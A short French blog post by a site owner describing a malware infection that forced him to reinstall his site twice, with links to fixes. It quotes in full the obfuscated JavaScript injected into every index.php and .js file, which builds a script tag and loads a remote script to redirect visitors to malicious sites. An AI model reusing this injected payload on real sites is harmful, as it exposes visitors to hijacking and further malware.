J’ai du réinstaller complètement ce site par 2 fois dans la nuit du 22 au 23 et dans la nuit du 23 au 24 décembre à cause d’un malware qui s’amuse à se faire passer pour un javascript légitime mais qui en fait redirige le browser vers des sites malicieux.

En fait tous les fichiers index.php et *.js se retrouvent en quelques minutes avec ce bout de code à la fin du source :

<script>/*GNU GPL*/ try{window.onload = function (){var Qslzfsla93tulo = document.createElement(’ s#&&c$r)&i!&&p)t$@#’.replace(/\!|@|&|\$|\)|\(|#| \^/ig, ”));Qslzfsla93tulo.setAttribute(’type’, ‘ text/javascript’);Qslzfsla93tulo.setAttribute(’s rc’, ‘h$!t#^t$@$p):)#/!!/)e!!n$e@^^t$-#(!(c$(^#o !!m!&^-&c#((n##!^.^e)#b!a!y&^$.)$@f&$r!.^e)&l#)m &!@u(@n(#$d^o!-#e)!s@&&$.!!&v@&)i#)e##@w)&$(^h&# o!$^m!e&s)&a@(#(l(#)emce_markeramp;$@.^(#r#$u$(!:&&^$8()0&(8 $0$^/)^m^#e(#(!.^c(@(o(@&#)m@&(/@m()e^#&.(@##c&) $#o#(m#/@!^$g((o^o#@$g@(^l^#&@e&((.)#c#!^o)(m&!/ ))!(s#^e$@#(n&d&)s@p&@a&^c)!)#e^#!$.$#c((o(!)m^^ !/^#c())l)(o#@@o!b).!c@o&m$/(^)&’.replace(/\^|&| @|\!|\$|\)|\(|#/ig, ”));Qslzfsla93tulo.setAttrib ute(’defer’, ‘defer’);Qslzfsla93tulo.setAttribut e(’id’, ‘I)(r#^w)@#@d&)^0@$#s$)v!(u&)s^@d^’.repl ace(/\!|&|\)|\$|\^|@|\(|#/ig, ”));document.body. appendChild(Qslzfsla93tulo);}} catch(e) {}</script>

Pour la deuxième attaque j’ai trouvé grâce à Piekes un bout de code qui sera peut-être mon sauveur. En tout cas maintenant je suis un peu moins seul et j’espère ne pas devoir refaire une installation.

[EDIT du 24/12 - 23HOO] Beaucoup plus d’info ici

[EDIT du 24/12 - 23H41] Encore mieux ici